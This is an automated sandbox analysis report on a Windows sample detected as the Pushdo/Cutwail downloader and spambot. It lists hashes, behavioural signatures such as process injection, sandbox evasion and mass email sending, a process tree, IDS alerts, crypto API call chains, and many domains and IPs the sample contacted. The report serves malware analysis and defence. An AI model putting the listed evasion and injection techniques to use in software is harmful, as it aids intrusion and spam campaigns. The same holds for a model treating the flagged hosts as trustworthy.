Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nhVJ8J5qOt.exe

Overview

General Information

Sample Name:nhVJ8J5qOt.exe
Original Sample Name:2cca5c1b1f00170bd750694d9511015b.exe
Analysis ID:1266961
MD5:2cca5c1b1f00170bd750694d9511015b
SHA1:0488276b184bdc4584be02f6b53825304ec00f3b
SHA256:65bd8c10cd1dcfb28f173ced5f6de2e98a5a592e9129a4637d10654951a0d1fc
Tags:Cutwailexe
Infos:

Detection

Pushdo
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Backdoor Pushdo
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Send many emails (e-Mail Spam)
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
Drops PE files to the user root directory
Contains functionality to inject threads in other processes
Tries to resolve many domain names, but no domain seems valid
Contains functionality to compare user and computer (likely to detect sandboxes)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Connects to many different domains
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evasive API chain (may stop execution after accessing registry keys)
Drops PE files to the user directory
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • nhVJ8J5qOt.exe (PID: 480 cmdline: C:\Users\user\Desktop\nhVJ8J5qOt.exe MD5: 2CCA5C1B1F00170BD750694D9511015B)
    • svchost.exe (PID: 6696 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 6084 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 1852 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5612 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 6340 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • svchost.exe (PID: 17004 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 5852 cmdline: "C:\Users\user\pigalicapi.exe" MD5: 2CCA5C1B1F00170BD750694D9511015B)
    • svchost.exe (PID: 5540 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 5052 cmdline: "C:\Users\user\pigalicapi.exe" MD5: 2CCA5C1B1F00170BD750694D9511015B)
    • svchost.exe (PID: 3476 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PushdoPushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.813790017.0000000001270000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
    00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
      00000001.00000002.813345942.0000000001170000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.nhVJ8J5qOt.exe.1270000.1.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
          3.2.pigalicapi.exe.7b0000.1.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
            1.2.pigalicapi.exe.1170000.2.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
              5.2.svchost.exe.4000000.6.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                4.2.svchost.exe.4000000.5.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                  Click to see the 4 entries
                  No Sigma rule has matched
                  Timestamp:72.251.233.245192.168.2.680531422037771 07/05/23-08:07:22.438252
                  SID:2037771
                  Source Port:80
                  Destination Port:53142
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.6172.67.208.6749711802016867 07/05/23-08:05:48.109053
                  SID:2016867
                  Source Port:49711
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:63.251.106.25192.168.2.680502702037771 07/05/23-08:07:09.906290
                  SID:2037771
                  Source Port:80
                  Destination Port:50270
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:173.231.184.124192.168.2.680503382037771 07/05/23-08:07:13.008395
                  SID:2037771
                  Source Port:80
                  Destination Port:50338
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: nhVJ8J5qOt.exeVirustotal: Detection: 28%Perma Link
                  Source: nhVJ8J5qOt.exeReversingLabs: Detection: 28%
                  Source: http://www.stajum.com/MAvira URL Cloud: Label: malware
                  Source: http://www.valselit.com/174-appartement-a-vendre-grenoble-30514Avira URL Cloud: Label: malware
                  Source: http://www.credo.edu.pl/Avira URL Cloud: Label: malware
                  Source: https://www.aevga.com/Avira URL Cloud: Label: malware
                  Source: http://www.valselit.com/177-appartement-a-vendre-sigean-30378Avira URL Cloud: Label: malware
                  Source: http://www.speelhal.net/eAvira URL Cloud: Label: malware
                  Source: http://www.speelhal.net/QAvira URL Cloud: Label: malware
                  Source: http://www.abart.pl/.Avira URL Cloud: Label: phishing
                  Source: C:\Users\user\pigalicapi.exeReversingLabs: Detection: 28%
                  Source: nhVJ8J5qOt.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\pigalicapi.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01178970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,1_2_01178970
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01178800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_01178800
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01178BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_01178BB0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01174BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,1_2_01174BA0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_011747F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,1_2_011747F0
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01178A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_01178A70
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01174880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,1_2_01174880
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_01178CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,1_2_01178CF0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,3_2_007B8A70
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,3_2_007B8800
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,3_2_007B8970
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B47F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,3_2_007B47F0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B8BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,3_2_007B8BB0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B4BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,3_2_007B4BA0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B8CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,3_2_007B8CF0
                  Source: C:\Users\user\pigalicapi.exeCode function: 3_2_007B4880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,3_2_007B4880

                  Compliance

                  barindex
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeUnpacked PE file: 0.2.nhVJ8J5qOt.exe.1270000.1.unpack
                  Source: C:\Users\user\pigalicapi.exeUnpacked PE file: 1.2.pigalicapi.exe.1170000.2.unpack
                  Source: nhVJ8J5qOt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:50101 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:50151 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.6:50154 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.6:50157 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.207:443 -> 192.168.2.6:50184 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:50136 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.6:50199 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:50206 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:50232 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:50261 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.6:50269 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:50248 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.6:52825 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.6:52824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:55146 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:5088 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:5098 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:5112 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:5091 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.6:5171 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.48.207:443 -> 192.168.2.6:5201 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.6:5185 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:5215 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.6:5195 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:5223 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:5239 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.6:5316 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.6:5377 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.6:5371 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.6:5374 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.6:5519 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.6:5573 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.6:5513 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:5319 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.6:6006 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.193.133:443 -> 192.168.2.6:7015 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.6:6251 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.6:6984 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.6:7432 version: TLS 1.2
                  Source: nhVJ8J5qOt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_00372D3C FindFirstFileA,GetModuleHandleA,0_2_00372D3C
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_00372940 FindFirstFileA,GetModuleHandleA,0_2_00372940
                  Source: C:\Users\user\Desktop\nhVJ8J5qOt.exeCode function: 0_2_00381BA9 FindFirstFileExW,0_2_00381BA9
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C72940 FindFirstFileA,GetModuleHandleA,1_2_00C72940
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C72D3C FindFirstFileA,GetModuleHandleA,1_2_00C72D3C
                  Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00C81BA9 FindFirstFileExW,1_2_00C81BA9

                  Networking

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dayvo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: enguita.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.74.184.61 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.180.58.31 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.55.214 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: notis.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.226.70.66 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.169.48 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.194.202.26 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 37.59.243.164 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.163.45.187 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.189.66.202 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 88.86.118.82 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.13.244 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vdoherty.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.159.3.117 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftmobile.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.123.195 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.19.218.80 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.102.136.180 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: semuk.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.96.252.188 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.177.126.27 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.132.175.106 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: websy.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nblewis.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: amba-tc.si
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.204.129.113 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.76.64.25 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.195.12.38 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.70.75 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pohlfood.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 136.243.147.81 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: angework.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.53.77.146 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.191.209.76 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 127.0.0.11 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 221.132.33.88 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.255.29.192 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.236.62.147 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.55 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 128.204.134.138 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.59 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.31.143.1 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: peminet.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pccj.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.31 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnw.us
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.170.12.50 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.synetik.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjbmw.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.231.184.124 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gujarat.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ifesnet.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpwpb.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: akdeniz.nl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 174.129.25.170 80
